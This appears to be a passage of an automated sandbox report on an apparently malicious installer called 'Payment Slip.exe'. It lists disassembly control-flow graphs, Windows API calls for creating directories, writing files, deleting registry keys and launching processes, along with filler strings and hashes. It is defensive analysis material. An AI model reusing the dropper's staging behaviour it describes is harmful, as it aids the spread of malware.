                                              control_flow_graph 653 4015b9-4015cd call 402b38 call 4059de 658 401614-401617 653->658 659 4015cf-4015eb call 405960 CreateDirectoryW 653->659 660 401646-402195 call 401423 658->660 661 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 658->661 668 40160a-401612 659->668 669 4015ed-4015f8 GetLastError 659->669 674 4029c5-4029d4 660->674 661->674 677 40163e-401641 661->677 668->658 668->659 670 401607 669->670 671 4015fa-401605 GetFileAttributesW 669->671 670->668 671->668 671->670 677->674
                                              APIs
                                                • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment Slip.exe"), ref: 004059EC
                                                • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                              • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                              • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes,?,00000000,000000F0), ref: 00401630
                                              Strings
                                              • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes, xrefs: 00401623
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                              • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes
                                              • API String ID: 3751793516-449055245
                                              • Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                              • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                              • Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                              • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 679 40638e-4063b1 680 4063b3-4063b6 679->680 681 4063bb-4063be 679->681 682 406ddb-406ddf 680->682 683 4063c1-4063ca 681->683 684 4063d0 683->684 685 406dd8 683->685 686 4063d7-4063db 684->686 687 406517-406bbe 684->687 688 40647c-406480 684->688 689 4064ec-4064f0 684->689 685->682 695 4063e1-4063ee 686->695 696 406dc3-406dd6 686->696 698 406bc0-406bd6 687->698 699 406bd8-406bee 687->699 693 406486-40649f 688->693 694 406d2c-406d36 688->694 690 4064f6-40650a 689->690 691 406d3b-406d45 689->691 697 40650d-406515 690->697 691->696 700 4064a2-4064a6 693->700 694->696 695->685 701 4063f4-40643a 695->701 696->682 697->687 697->689 704 406bf1-406bf8 698->704 699->704 700->688 705 4064a8-4064ae 700->705 702 406462-406464 701->702 703 40643c-406440 701->703 708 406472-40647a 702->708 709 406466-406470 702->709 706 406442-406445 GlobalFree 703->706 707 40644b-406459 GlobalAlloc 703->707 710 406bfa-406bfe 704->710 711 406c1f-406c2b 704->711 712 4064b0-4064b7 705->712 713 4064d8-4064ea 705->713 706->707 707->685 714 40645f 707->714 708->700 709->708 709->709 715 406c04-406c1c 710->715 716 406dad-406db7 710->716 711->683 718 4064c2-4064d2 GlobalAlloc 712->718 719 4064b9-4064bc GlobalFree 712->719 713->697 714->702 715->711 716->696 718->685 718->713 719->718
                                              Strings
                                              • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                              • API String ID: 0-2559241417
                                              • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                              • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                              • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                              • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 720 402b78-402ba1 RegOpenKeyExW 721 402ba3-402bae 720->721 722 402c0c-402c10 720->722 723 402bc9-402bd9 RegEnumKeyW 721->723 724 402bb0-402bb3 723->724 725 402bdb-402bed RegCloseKey call 406252 723->725 727 402c00-402c03 RegCloseKey 724->727 728 402bb5-402bc7 call 402b78 724->728 732 402c13-402c19 725->732 733 402bef-402bfe 725->733 730 402c09-402c0b 727->730 728->723 728->725 730->722 732->730 735 402c1b-402c29 RegDeleteKeyW 732->735 733->722 735->730 737 402c2b 735->737 737->722
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                              • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                              • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Close$DeleteEnumOpen
                                              • String ID:
                                              • API String ID: 1912718029-0
                                              • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                              • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                              • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                              • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 738 403060-40306e 739 403070-403086 SetFilePointer 738->739 740 40308c-403095 call 40317b 738->740 739->740 743 403175-403178 740->743 744 40309b-4030ae call 405bd7 740->744 747 403161 744->747 748 4030b4-4030c8 call 40317b 744->748 750 403163-403164 747->750 748->743 752 4030ce-4030d1 748->752 750->743 753 4030d3-4030d6 752->753 754 40313d-403143 752->754 757 403172 753->757 758 4030dc 753->758 755 403145 754->755 756 403148-40315f ReadFile 754->756 755->756 756->747 759 403166-40316f 756->759 757->743 760 4030e1-4030eb 758->760 759->757 761 4030f2-403104 call 405bd7 760->761 762 4030ed 760->762 761->747 765 403106-40311b WriteFile 761->765 762->761 766 403139-40313b 765->766 767 40311d-403120 765->767 766->750 767->766 768 403122-403135 767->768 768->760 769 403137 768->769 769->757
                                              APIs
                                              • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                              • WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                              Strings
                                              • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: File$PointerWrite
                                              • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                              • API String ID: 539440098-2559241417
                                              • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                              • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                              • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                              • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 770 405b83-405b8f 771 405b90-405bc4 GetTickCount GetTempFileNameW 770->771 772 405bd3-405bd5 771->772 773 405bc6-405bc8 771->773 775 405bcd-405bd0 772->775 773->771 774 405bca 773->774 774->775
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00405BA1
                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CountFileNameTempTick
                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                              • API String ID: 1716503409-44229769
                                              • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                              • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                              • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                              • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                              APIs
                                              • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                              • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                              • RegSetValueExW.KERNELBASE(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                              • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CloseCreateValuelstrlen
                                              • String ID:
                                              • API String ID: 1356686001-0
                                              • Opcode ID: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                              • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                              • Opcode Fuzzy Hash: 4180e4ab82bff7ff89890fe0cd785ffe3c04f71f059799902af0cb5b0267beb0
                                              • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                              APIs
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                • Part of subcall function 00405663: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                              • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                              • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                              • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                              • String ID:
                                              • API String ID: 3585118688-0
                                              • Opcode ID: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                              • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                              • Opcode Fuzzy Hash: b9acc33138c3e4e902b3b85438cd98049fdd0351d6a83afd457270008e50ac81
                                              • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                              APIs
                                              • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                              • CloseHandle.KERNEL32(?), ref: 00405695
                                              Strings
                                              • Error launching installer, xrefs: 00405676
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: CloseCreateHandleProcess
                                              • String ID: Error launching installer
                                              • API String ID: 3712363035-66219284
                                              • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                              • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                              • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                              • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                              APIs
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061DF
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,?,?,00000000), ref: 004061EE
                                                • Part of subcall function 0040617C: CharNextW.USER32(?,"C:\Users\user\Desktop\Payment Slip.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 004061F3
                                                • Part of subcall function 0040617C: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403330,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00406206
                                              • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,00403510), ref: 00403345
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079780663.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Payment Slip.jbxd
                                              Similarity
                                              • API ID: Char$Next$CreateDirectoryPrev
                                              • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                              • API String ID: 4115351271-2030658151
                                              • Opcode ID: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                              • Instruction ID: 83aabcaf15b65d6ee402870331ad2dcb86c8daa90b7dc9f7dbfd98a18550c494
                                              • Opcode Fuzzy Hash: 2b9d125acdda4009adb7d2b0ceacb9d20b61df0616837bb0775500318951db81
                                              • Instruction Fuzzy Hash: 92D0A921006830B1C54232263C02FCF192C8F0A32AF12A037F808B40D2CB3C2A8284FE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2079433113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2079412062.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079489185.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2079509536.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
